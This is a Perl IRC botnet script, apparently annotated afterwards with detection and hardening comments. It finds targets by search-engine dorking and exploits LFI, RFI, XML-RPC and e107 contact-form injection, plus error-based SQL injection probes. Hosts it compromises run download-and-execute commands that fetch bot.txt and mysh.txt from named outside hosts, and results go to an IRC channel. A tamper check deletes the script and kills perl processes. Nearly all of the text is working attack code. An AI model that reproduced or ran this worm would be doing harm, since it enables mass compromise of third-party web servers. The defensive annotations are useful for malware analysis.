parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
##################################################################### Procedure
# cmdlfi: send one operator-supplied command through a file-inclusion URL and
# relay the output to the channel.
# Arguments: $_[0] the URL (the caller has already appended the
# /proc/self/environ traversal), $_[1] the command text.
# The PHP snippet travels in the User-Agent header, wrapped in the marker
# "j13mbut" so the output can be cut out of the response body.
# Detection: web-server logs showing a User-Agent that contains "<?",
# "system(" or the marker string, on a request whose path or query contains
# "/proc/self/environ".
# Hardening: the underlying flaw is an include path built from request input;
# PHP's open_basedir setting can additionally restrict which paths a script
# may read.
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
$browser->agent("$hie");
$browser->timeout(3);
$response = $browser->get( $url );
# Anything between the two markers is printed locally and sent to the channel.
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
print $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI-CMD14)7 $1");
}
}
# lfiscan: collect candidate hosts from one search engine and test each for a
# file-inclusion flaw that exposes /proc/self/environ.
# Arguments: $_[0] engine name, $_[1] path fragment to test, $_[2] search query.
# The helpers google, alltheweb, Bing, altavista, ask, uol, yahoo, calculate,
# getcontent and lfiexploit are not defined in the visible part of the file.
# Results accumulate in the package-global @lfitotal.
sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @lfigoogle=&google($dork);
push(@lfitotal, @lfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @lfialltheweb=&alltheweb($dork);
push(@lfitotal, @lfialltheweb);

}
if ($engz =~ /Bing/) {
my @lfiBing=&Bing($dork);
push(@lfitotal, @lfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @lfialtavista=&altavista($dork);
push(@lfitotal, @lfialtavista);
}
if ($engz =~ /AsK/) {
my @lfiask=&ask($dork);
push(@lfitotal, @lfiask);
}
if ($engz =~ /UoL/) {
my @lfiuol=&uol($dork);
push(@lfitotal, @lfiuol);
}
if ($engz =~ /YahOo/) {
my @lfiyahoo=&yahoo($dork);
push(@lfitotal, @lfiyahoo);
}
my @lficlean = &calculate(@lfitotal);
# Empty conditional on @clean, an array that is not set in this function.
if (scalar(@clean) != 0) {
}
my $uni=scalar(@lficlean);
foreach my $lfitarget (@lficlean)
{
$contatore++;
# The "done" notice is sent when the counter is one below the target count.
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4@14$engz14) Sc
anning Done For7 $dork");
}
my $lfi = "../../../../../../../../../../../../../../..";
# Probe URL: host + tested path + the /proc/self/environ suffix from $rspo_test.
my $xpl = "http://".$lfitarget.$bugz.$rspo_test;
my $vuln = "http://".$lfitarget."2".$bugz."12".$rspo_test."";
my $re = getcontent($xpl);
# A response showing both DOCUMENT_ROOT=/ and HTTP_USER_AGENT is taken as
# proof that the process environment was included in the page.
# Detection: any request containing "/proc/self/environ" is worth alerting on;
# a 200 response whose body contains those two names confirms exposure.
if ($re =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; }
else {
# Fingerprint step: system and user identity are read back between markers.
my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
$rspo =~ s/\n//g;
if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
my ($sys,$uid) = ($1,$2);
# Spread step: a fixed download-run-delete chain plus a copy of $rfiid saved
# as /tmp/cmd<number>, where the number is a random integer below 2010.
# Host indicators: the web-server account spawning wget, lwp-download or perl;
# files named bot.txt or /tmp/cmd<number>; outbound HTTP from the web server
# to hosts it has no reason to contact.
# Mitigation: restrict outbound connections from web servers and alert on the
# web-server account starting download tools or interpreters.
my $lfispread = "cd /tmp;lwp-download
http://www.otbr.com.br/bot.txt;perl bot.txt;rm -rf *.txt*;wget http://www.otbr.c
om.br/bot.txt;perl bot.txt;rm -rf *.txt*";
my $tmp = "/tmp/cmd".int rand(2010);
my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread
"); sleep(1);
my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'%
00');
# The marker "ratoscan4" in the follow-up response decides which of the two
# report formats is sent to the channel and to $runner.
if ($res =~ /ratoscan4/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4
@14$engz14)14(7@14PHPSheLL14)3 http://".$lfitarget."12".$bugz."10".$lfi."6".$tmp."%00 14(0".
$sys."14)");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14LFI14)(4@1
4$engz14)14(7@14PHPSheLL14)3 http://".$lfitarget."12".$bugz."10".$lfi."6".$tmp."%00 14(0".$
sys."14)");
}
else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4


@14$engz14)14(7@14System14)3 http://".$lfitarget."12".$bugz."10[LFI] 14(0".$sys." 14uid=".$u
id."14)");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14LFI14)(4@1
4$engz14)14(7@14System14)3 http://".$lfitarget."12".$bugz."10[LFI] 14(0".$sys." 14uid=".$ui
d."14)");
}
}
else {
}
} exit } sleep(3);
}
}
}
# cmdxml: send one operator-supplied command inside an XML methodCall body and
# relay the output to the channel.
# Arguments: $_[0] target URL, $_[1] command text.
# The request is a POST with Content-Type text/xml and the User-Agent
# "perl post"; output is read back between the markers "bamby" and "solo".
# Detection: POST bodies to XML-RPC endpoints in which the <name> value holds
# quote-and-parenthesis sequences followed by echo statements, together with
# the "perl post" User-Agent.
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';echo`".$dwa."`;echo'solo';exit;/*</name></value
></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content
=> $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML-CMD14)7 $1");
}
}
# xmlscan: collect candidate hosts from one search engine and test each for an
# XML methodCall endpoint.
# Arguments: $_[0] engine name, $_[1] path fragment to test, $_[2] search query.
# The search helpers, calculate, getcontent and xmlxspread are not defined in
# the visible part of the file. Results accumulate in the package-global
# @xmltotal.
sub xmlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @xmlgoogle=&google($dork);
push(@xmltotal, @xmlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @xmlalltheweb=&alltheweb($dork);
push(@xmltotal, @xmlalltheweb);
}
if ($engz =~ /Bing/) {
my @xmlBing=&Bing($dork);
push(@xmltotal, @xmlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @xmlaltavista=&altavista($dork);
push(@xmltotal, @xmlaltavista);
}
if ($engz =~ /AsK/) {
my @xmlask=&ask($dork);
push(@xmltotal, @xmlask);
}
if ($engz =~ /UoL/) {
my @xmluol=&uol($dork);
push(@xmltotal, @xmluol);
}

if ($engz =~ /YahOo/) {
my @xmlyahoo=&yahoo($dork);
push(@xmltotal, @xmlyahoo);
}
my @xmlclean = &calculate(@xmltotal);
# Empty conditional; it has no effect.
if (scalar(@xmlclean) != 0) {
}
my $uni=scalar(@xmlclean);
foreach my $xmltarget (@xmlclean)
{
$contatore++;
# The "done" notice is sent when the counter is one below the target count.
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel ::14,1(7@14XML14)14(4@14$engz14)14
Scanning Done For7 $dork");
}
my $xpl = "http://".$xmltarget.$bugz;
# Fixed download-run-delete chain handed to xmlxspread() for hosts that pass
# the check below.
# Host indicators: a file named mysh.txt in /tmp and the web-server account
# spawning lwp-download, wget or perl.
my $xmlsprd = "cd /tmp;lwp-download http://iseulbi.com/xe/mysh.t
xt;perl mysh.txt;rm -rf *.txt*;wget http://iseulbi.com/xe/mysh.txt;perl mysh.txt
;rm -rf *.txt*";
my $strona = getcontent($xpl);
# A plain GET that returns the text "faultCode" is treated as a sign that the
# path is an XML methodCall endpoint; such hosts go on to xmlcek() and
# xmlxspread().
if ( $strona =~ /faultCode/ ) {
xmlcek($xpl);
xmlxspread($xpl,$xmlsprd);
}
}
}
# rfiscan: collect candidate hosts from one search engine and test each for
# remote file inclusion.
# Arguments: $_[0] engine name, $_[1] path fragment to test, $_[2] search query.
# The search helpers, calculate, getcontent and os are not defined in the
# visible part of the file. Results accumulate in the package-global @rfitotal.
sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @rfigoogle=&google($dork);
push(@rfitotal, @rfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @rfialltheweb=&alltheweb($dork);
push(@rfitotal, @rfialltheweb);
}
if ($engz =~ /Bing/) {
my @rfiBing=&Bing($dork);
push(@rfitotal, @rfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @rfialtavista=&altavista($dork);
push(@rfitotal, @rfialtavista);
}
if ($engz =~ /AsK/) {
my @rfiask=&ask($dork);
push(@rfitotal, @rfiask);
}
if ($engz =~ /UoL/) {
my @rfiuol=&uol($dork);
push(@rfitotal, @rfiuol);
}
if ($engz =~ /YahOo/) {
my @rfiyahoo=&yahoo($dork);
push(@rfitotal, @rfiyahoo);
}

my @rficlean = &calculate(@rfitotal);
# Empty conditional; it has no effect.
if (scalar(@rficlean) != 0) {
}
my $uni=scalar(@rficlean);
foreach my $rfitarget (@rficlean)
{
$contatore++;
# The "done" notice is sent when the counter is one below the target count.
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel ::14,1(7@14RFI14)14(4@14$engz14)14
Scanning Done For7 $dork");
}
# Probe URL: host + tested path + the remote file URL held in $rfiid.
# Detection: request parameters whose value is itself an absolute http:// URL,
# and the web server then fetching that URL.
# Hardening: do not build include paths from request input; PHP's
# allow_url_include setting controls whether include() accepts URLs at all.
my $rfixpl = "http://".$rfitarget.$bugz.$rfiid;
my $inj
= " http://".$rfitarget."12".$bugz."7[PHPCMD]?";
my $re = getcontent($rfixpl);
# The marker "ratoscan4" in the response means the remote file was included
# and run by the target.
if ($re =~ /ratoscan4/){
# $rfispd and $os are not set anywhere in this function.
getcontent($rfispd);
os($rfixpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)3$
inj0 $os");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14RFI14)3$i
nj0 $os");
}
}
}
# sqlscan: collect candidate hosts from one search engine and test each for
# error-based SQL injection.
# Arguments: $_[0] engine name, $_[1] path fragment to test, $_[2] search query.
# The search helpers, calculate, getcontent and sqlbrute are not defined in
# the visible part of the file. Results accumulate in the package-global
# @sqltotal.
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @sqlgoogle=&google($dork);
push(@sqltotal, @sqlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @sqlalltheweb=&alltheweb($dork);
push(@sqltotal, @sqlalltheweb);
}
if ($engz =~ /Bing/) {
my @sqlBing=&Bing($dork);
push(@sqltotal, @sqlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @sqlaltavista=&altavista($dork);
push(@sqltotal, @sqlaltavista);
}
if ($engz =~ /AsK/) {
my @sqlask=&ask($dork);
push(@sqltotal, @sqlask);
}
if ($engz =~ /UoL/) {
my @sqluol=&uol($dork);
push(@sqltotal, @sqluol);
}
if ($engz =~ /YahOo/) {
my @sqlyahoo=&yahoo($dork);
push(@sqltotal, @sqlyahoo);
}
my @sqlclean = &calculate(@sqltotal);
# Empty conditional; it has no effect.
if (scalar(@sqlclean) != 0) {
}

my $uni=scalar(@sqlclean);
foreach my $sqltarget (@sqlclean)
{
$contatore++;
# The "done" notice is sent when the counter is one below the target count.
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14(4@14$engz14)14 Scan
ning Done For14 $dork");
}
# Probe URL: host + tested path with a single quote appended.
my $xpl = "http://".$sqltarget.$bugz."'";
my $vuln = "http://".$sqltarget."12".$bugz."7[SQL]";
my $sqlsite = "http://".$sqltarget.$bugz;
my $strona = getcontent($xpl);
# The response is matched against database error texts (MySQL, SQL Server,
# Access/JET). A match is reported to the channel; MySQL matches are also
# passed to sqlbrute().
# Mitigation: the check depends on the application echoing raw database errors
# to the client, so returning generic error pages removes this signal, and
# parameterized queries remove the underlying flaw.
# Detection: bursts of requests whose parameter values end in a lone "'".
if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m
/Query failed/i || $strona =~ m/SQL query failed/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MySQL1
4)7 $vuln ");&sqlbrute($sqlsite);}
elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Un
closed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MsSQL1
4)7 $vuln ");}
elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/OD
BC Microsoft Access Driver/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MsAcc
ess14)7 $vuln ");}
}
}
# cmde107: send one operator-supplied command to an e107 contact form and
# relay the output to the channel.
# Arguments: $_[0] URL to POST to, $_[1] command text.
# The command is base64-encoded and embedded in PHP text that is placed inside
# a [php] tag in the author_name form field.
# Detection: POST requests whose body contains "send-contactus=1" and an
# author_name value starting with "%5Bphp%5D".
# Mitigation: update the affected e107 installation and block form fields
# carrying [php] tags at the web application firewall.
sub cmde107() {
my $path = $_[0];
my $incmd = $_[1];
my $codecmd = encode_base64($incmd);
# The built PHP text is also printed to the bot's own standard output.
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base
64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd
;
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%
5B%2Fphp%5D");
my $res = $access->request($req);
my $data = $res->as_string;
# Text following the marker "ByroeNet" on the same line is sent to the channel.
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e107-CMD14)4 $mydata");
}
}
# e107scan: collect candidate hosts from one search engine and test each
# host's /contact.php for the e107 [php]-tag injection.
# Arguments: $_[0] engine name, $_[1] path fragment (unused in the request,
# which always targets /contact.php), $_[2] search query.
# The search helpers and calculate are not defined in the visible part of the
# file. Results accumulate in the package-global @e107total.
sub e107scan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @e107google=&google($dork);
push(@e107total, @e107google);
}
if ($engz =~ /AllTheWeb/) {
my @e107alltheweb=&alltheweb($dork);
push(@e107total, @e107alltheweb);
}

if ($engz =~ /Bing/) {
my @e107Bing=&Bing($dork);
push(@e107total, @e107Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @e107altavista=&altavista($dork);
push(@e107total, @e107altavista);
}
if ($engz =~ /AsK/) {
my @e107ask=&ask($dork);
push(@e107total, @e107ask);
}
if ($engz =~ /UoL/) {
my @e107uol=&uol($dork);
push(@e107total, @e107uol);
}
if ($engz =~ /YahOo/) {
my @e107yahoo=&yahoo($dork);
push(@e107total, @e107yahoo);
}
my @e107clean = &calculate(@e107total);
# Empty conditional; it has no effect.
if (scalar(@e107clean) != 0) {
}
my $uni=scalar(@e107clean);
foreach my $e107target (@e107clean)
{
$contatore++;
# The "done" notice is sent when the counter is one below the target count.
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)(4@14$engz14)14
Scanning Done For7 $dork");
}
# PHP text that prints php_uname() between two base64-encoded markers (the
# response is searched for "Voo" ... "Doo" below) and then include()s two
# base64-encoded URLs. Decode those two values when building network
# indicators for this specimen.
my $cmd = "echo(base64_decode(\"Vm9v\").php_uname().base64_decod
e(\"RG9v\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWs
vaW1hZ2VzL25ldy9wYm90LnR4dD8=\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW
50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8=\"));";
my $ua = LWP::UserAgent->new or die;
# Fixed User-Agent string; usable as a request-log indicator together with the
# POST body pattern below.
$ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
$ua->timeout(15);
my $xpl = "http://".$e107target."/contact.php";
$xpl =~ s/\/\/contact.php/\/contact.php/g;
my $req = HTTP::Request->new(POST => $xpl);
$req->content_type('application/x-www-form-urlencoded');
# Detection: POST to /contact.php whose body contains "send-contactus=1" and
# an author_name value starting with "%5Bphp%5D".
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3B
die%28%29%3B%5B%2Fphp%5D");
my $res = $ua->request($req);
my $cont = $res->content;
# A response carrying the markers is reported to the channel with the system
# description, and the host is passed on to spreade107().
if ($cont =~ /Voo(.*)Doo/) {
my $uname = $1;
$uname=~s/\n//;
$uname=~s/\r//;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7
@14e10714)(3$xpl14)0 $uname ");
&spreade107($xpl);
}
}
}
# spreade107($url)
# Follow-up for a host that answered e107scan(): sends the same [php]
# contact-form POST to $url, but with PHP that runs shell commands through
# shell_exec(). The reply text after the "ByroeNet" marker is sent to the IRC
# channel.
#
# Host-side indicators taken from the command string below: the web-server
# account changing to /var/tmp, invoking curl, wget or lwp-download for a file
# named bot.txt, running it with perl, then deleting it. Listing shell_exec in
# PHP's disable_functions and filtering outbound traffic from the web server
# both interrupt this stage.
# NOTE(review): the "https://fanyv88.com:443/" prefix in the URLs looks like link
# rewriting by the hosting page rather than part of the original script.
sub spreade107() {
my $path = $_[0];
# Download-and-run command line; the blank lines inside the literal are part of
# the string as printed on this page.
my $incmd = "cd /var/tmp; curl -O http://www.otbr.com.br/bot.txt; perl bot.txt;

wget http://www.otbr.com.br/bot.txt; perl bot.txt; lwp-download http://www.otbr.


com.br/bot.txt; perl bot.txt; rm -rf bot.txt";
# The command is base64-encoded so it passes through the form field intact.
my $codecmd = encode_base64($incmd);
# PHP fragment: echoes the output of a base64-encoded shell command between two
# base64-encoded markers (the second decodes to the "ByroeNet" string matched
# below), then runs $codecmd. The fragment is also printed to the bot's stdout.
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base
64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd
;
# $access is not declared with my, so it is a package global.
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%
5B%2Fphp%5D");
my $res = $access->request($req);
# as_string includes the status line and headers as well as the body.
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e107-CMD14)4 $mydata");
}
}
# enc(): sends the MD5 hex digest of a string to the IRC channel.
# The input is taken from the regex capture variable $1, not from @_, so the
# value depends on the most recent successful match before the call.
sub enc()
{
my $md5_hash = $1;
my $md5_generated = md5_hex($md5_hash);
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 Encode14)7 $md5_generated"
);
}
# dec(): looks up an MD5 hash through a third-party web service and sends the
# result to the IRC channel.
# The hash comes from the capture variable $1 (not @_) and is placed in the
# query string of the lookup URL, so it is disclosed to that service.
sub dec()
{
my $md5 = $1;
my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
my $found = getcontent($crac);
# On a match, $1 is the CDATA content returned by the service. When the match
# fails, $1 keeps its previous value, so the else branch sends that value under
# the same "md5 Decode" label; the two branches are otherwise identical.
if
($found =~ /<string><!\[CDATA\[(.*)\]\]><\/string>/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 De
code14)7 $1");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 De
code14)7 $1");
}
}
# xmlcek($url)
# Sends one XML-RPC POST to $url whose <name> value closes a quoted string and
# appends PHP that prints the output of `uname -a` between two "j13mb0t"
# markers. If the markers come back, the captured text is reported to $channel
# and $runner.
#
# Indicators visible below: Content-Type text/xml, methodName "test.method",
# a <name> element beginning with "',''));", User-Agent "perl post", and the
# string "j13mb0t" in the response. A response carrying the marker means the
# endpoint evaluated request data as code and needs patching or removal.
# NOTE(review): POST here is presumably HTTP::Request::Common's helper; its
# import is outside this part of the file.
sub xmlcek {
my $xmltgt = $_[0];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
# $exploit and $os are not declared with my; both are package globals.
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*</name></
value></param></params></methodCall>";
my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Con
tent => $exploit);
# /s lets the capture span several lines of command output.
if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
$os=$1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)(3$xmltgt14)0 $os ");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14XML14)(3$xmltgt14)0 $os ");
}}
# xmlxspread($url, $command)
# Same XML-RPC request shape as xmlcek(), but the PHP fragment runs the
# caller-supplied $command in backticks between the markers "j13m" and "b0T".
# The response is stored in $response and never read, so this sub reports
# nothing back.
# Detection is the same as for xmlcek(): text/xml POSTs from User-Agent
# "perl post" whose <name> value starts with "',''));".
sub xmlxspread() {
my $xmltargt = $_[0];

my $xmlsprd = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
# $exploit is a package global shared with xmlcek().
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*</name></val
ue></param></params></methodCall>";
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', C
ontent => $exploit);
}
# getcontent($url): issue a single HTTP GET with a 15-second timeout and return
# the response body. The status code is not inspected, so the body of an error
# response is returned as well.
sub getcontent() {
    my ($address) = @_;
    my $client = LWP::UserAgent->new();
    $client->timeout(15);
    my $request = HTTP::Request->new(GET => $address);
    return $client->request($request)->content;
}
# lfiexploit($url, $command)
# Issues a GET to $url with a User-Agent header that is itself a PHP snippet:
# it echoes "j13mb0t#", passes $command to passthru(), and echoes "#j13mb0t".
# The response body is returned unparsed for the caller to inspect.
# NOTE(review): presumably $url makes the target include a server-side file
# that records the User-Agent header; that path is chosen by the caller and is
# not visible here.
#
# Indicators: a User-Agent value containing "<?php", and "j13mb0t#" in
# responses. Alerting on PHP open tags in request headers and listing passthru
# in PHP's disable_functions are the matching controls.
sub lfiexploit() {
my $url = $_[0];
my $rce = $_[1];
# $rce is concatenated between single quotes with no escaping.
my $agent = "<?php echo \"j13mb0t#\"; passthru(\'".$rce."\'); echo \"#j13mb0
t\"; ?>";
my $ua = LWP::UserAgent->new(agent => $agent);
$ua->timeout(15);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
}
# google($dork): fetch result pages for the encoded search string at start
# offsets 0, 100, ... 1000 and return the links() expansion of every http://
# href found, skipping captures that contain "google".
sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){
my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&s
tart=".$b);
my $Res=query($Go);
# The capture runs from after "http://" to the last "/" before a quote or ">".
while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
# SIGN(): tamper check on the $powered and $mail globals. When $powered has no
# "M" or $mail has no "web", it prints a message and replaces the process with
# a shell command that deletes the script file ($0) and runs pkill perl.
# $0 is interpolated into the shell string unquoted, and pkill perl is not
# limited to this script's own process.
sub SIGN() {
if (($powered !~ /M/)||($mail !~ /web/)) {
print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
exec("rm -rf $0 && pkill perl");
}
}
# alltheweb($dork): fetch result pages at offsets 0, 100, ... 1000 and return
# the links() expansion of every URL shown in a resURL span.
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;

# $pg is declared but never used.
my $pg = 0;
for ($b=0; $b<=1000; $b+=100) {
my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=10
0&q=".key($key)."&o=".$b);
my $Res = query($all);
while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
# Remove spaces from the captured URL text.
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}
# uol($dork): fetch result pages at start offsets 1, 11, ... 991 and return the
# links() expansion of every http:// href, skipping captures that contain
# "busca", "uol" or "yahoo".
sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&st
art=".$b);
my $Res = query($UoL);
while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
# Inner $k shadows the outer one; $1 still holds the href capture because the
# negated match above does not overwrite it when it fails to match.
my $k
= $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Bing($dork): fetch result pages at "first" offsets 1, 11, ... 991 and return
# the links() expansion of every http:// href, skipping captures that contain
# "msn", "live" or "bing".
sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first="
.$b."&FORM=PERE");
my $Res = query($bing);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k
= $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# altavista($dork): fetch result pages at "stq" offsets 1, 11, ... 991 and
# return the links() expansion of the text captured from each "ngrn" span,
# skipping captures that contain "altavista".
sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1

&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
# The capture stops at the first "/" after the span tag.
while ($Res=~m/<span class=ngrn>(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
# Strip "<" characters and spaces from the capture.
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
# ask($dork): fetch result pages with "page" values 0, 10, ... 1000 and return
# the links() expansion of every http:// href that is followed by an
# onmousedown attribute, skipping captures that match /ask.com/.
sub ask() {
my @lst;
my $key = $_[0];
my $b = 0;
# $pg is declared but never used.
my $pg = 0;
for ($b=0; $b<=1000; $b+=10) {
my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=E
E90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
my $Res = query($Ask);
while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
# The dot in /ask.com/ is unescaped, so it matches any character there.
if ($1 !~ /ask.com/){
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# yahoo($dork): fetch result pages with "b" values 1 through 500 in steps of 1
# (500 requests) and return the links() expansion of the text found between
# "26u=" and "%26w=", skipping captures that contain "yahoo".
sub yahoo() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=500; $b+=1) {
my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $Res = query($yahoo);
while ($Res =~ m/26u=(.*?)%26w=/g) {
if ($1 !~ /yahoo/){
my $k = $1;
my @grep = links($k);
push(@lst, @grep);
}
}
}
return @lst;
}
# os($target): fetch $target with query() and store in the package global $os
# the text between "<br>OSTYPE:" and the next "<br>". If the page has several
# such fields, the last one wins; $os is left unchanged when there is none.
sub os() {
my $target=$_[0];
my $re = &query($target);
while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) {
$os = $1;
}
}

